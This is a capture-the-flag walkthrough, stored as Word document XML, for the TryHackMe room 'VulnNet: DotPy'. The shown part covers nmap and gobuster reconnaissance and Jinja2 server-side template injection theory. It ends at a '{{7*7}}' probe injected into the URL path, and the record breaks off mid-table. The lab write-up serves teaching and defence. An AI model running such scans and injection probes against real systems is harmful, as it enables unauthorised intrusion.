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color w:val="2F5496"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnNet: DotPy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Report — TryHackMe CTF Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Educational / CTF Lab Environment — TryHackMe.com</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3000"/>
        <w:gridCol w:w="7000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2F5496" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="2F5496" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Room Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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VulnNet: DotPy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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TryHackMe (https://tryhackme.com/room/vulnnetdotpy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Difficulty Theme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Web Exploitation (SSTI) → Linux Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Werkzeug httpd 1.0.1 (Python 3.6.9) — port 8080/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Core Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Server-Side Template Injection (SSTI/Jinja2), sudo misconfiguration (pip3), PYTHONPATH / module hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Final Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF"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Full compromise — root flag captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the full compromise of the “VulnNet: DotPy” machine on TryHackMe, from initial reconnaissance to root-level access. The attack chain consisted of three distinct stages: (1) discovery and exploitation of a Server-Side Template Injection (SSTI) vulnerability in a Flask/Jinja2 web application to obtain a low-privileged shell as the user “web”; (2) abuse of an overly permissive sudo rule (unrestricted “pip3 install”) to pivot to the user “system-adm”; and (3) exploitation of a PYTHONPATH / module-hijacking flaw in a sudo-executable Python backup script to escalate to root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each stage is broken down below with the exact commands and payloads used, an explanation of why the technique works, and the underlying security principle from both the attacker's and defender's perspective. This exercise is a strong illustration of how input validation gaps, over-broad sudo permissions, and unsafe use of interpreter search paths chain together into full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Port Scanning (Nmap)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The engagement began with a standard Nmap service/version scan against the target IP.</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sV -sC -p- &lt;target-ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT     STATE SERVICE REASON  VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">8080/tcp open  http    syn-ack Werkzeug httpd 1.0.1 (Python 3.6.9)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">| http-methods:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Supported Methods: HEAD GET OPTIONS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|_http-server-header: Werkzeug/1.0.1 Python/3.6.9</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">| http-title: VulnNet Entertainment -  Login  | Discover</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|_Requested resource was http://&lt;target-ip&gt;:8080/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only one open TCP port: 8080, running Werkzeug — the development WSGI server bundled with Flask.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Python 3.6.9 / Werkzeug 1.0.1 banner strongly suggests the backend is a Flask application, which almost always uses the Jinja2 templating engine by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker's perspective: a Flask/Werkzeug fingerprint is an immediate signal to consider SSTI later in the assessment, since Jinja2 SSTI is one of the most common critical vulnerabilities in small/custom Flask apps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defender's perspective: exposing the Werkzeug development server (rather than a production WSGI server such as gunicorn behind Nginx) is itself a misconfiguration — it is not hardened for production traffic and often leaks a debugger/interactive console if DEBUG mode is left on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsing to the service on port 8080 redirected automatically to a login page. Since no credentials were known, a test account was registered directly through the application (username/password: test/test) and used to authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With an authenticated session in hand, directory brute-forcing was attempted with Gobuster:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuster dir -u http://&lt;target-ip&gt;:8080 -w /usr/share/wordlists/dirb/common.txt -t 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan immediately failed with the following warning:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Error: the server returns a status code that matches the provided options for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">non existing urls. http://&lt;target-ip&gt;:8080/da2e5cdf-11eb-4c04-8929-8aef2f528587 =&gt; 403.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">To force processing of Wildcard responses, specify the '--wildcard' switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every non-existent path returned HTTP 403 instead of the expected 404 — a “wildcard” response. This behaviour is unusual for a plain routing 404 and hints that the application is intercepting and processing the URL path itself rather than simply matching it against defined Flask routes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A server that reflects arbitrary URL path segments back into logic (rather than returning a generic “not found”) is a classic early indicator of a template-injection or path-based injection point, because it means user-controlled input is reaching some processing/formatting layer before a response is generated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Vulnerability Analysis: Server-Side Template Injection (SSTI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Theory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Template Injection occurs when user-supplied input is concatenated directly into a template string that is then compiled and rendered by a templating engine (e.g. Jinja2, Twig, FreeMarker, Smarty), instead of being passed into the template safely as a data variable. Because template engines are essentially mini programming languages with their own syntax for logic, variables and, critically, attribute/method access, an attacker who can inject template syntax can often walk the Python object graph at runtime — reaching modules like os and eventually achieving arbitrary code execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Jinja2 specifically, the double-curly-brace syntax {{ expression }} evaluates a Python expression and renders its result into the page. If an application does something equivalent to render_template_string("..." + user_input + "..."), any Jinja2 syntax placed in user_input is executed server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Confirming the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The 403 behaviour suggested the application was reflecting the URL path. A basic mathematical Jinja2 payload was appended to the path to test for template evaluation:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /index{{7*7}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The application responded with the literal value 49 rendered in the page body (instead of the raw string “{{7*7}}”), which unambiguously confirms that Jinja2 expressions submitted in the URL path are being evaluated server-side.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2F5496" w:sz="4"/>
          <w:left w:val="single" w:color="2F5496" w:sz="24"/>
          <w:bottom w:val="single" w:color="2F5496" w:sz="4"/>
          <w:right w:val="single" w:color="2F5496" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
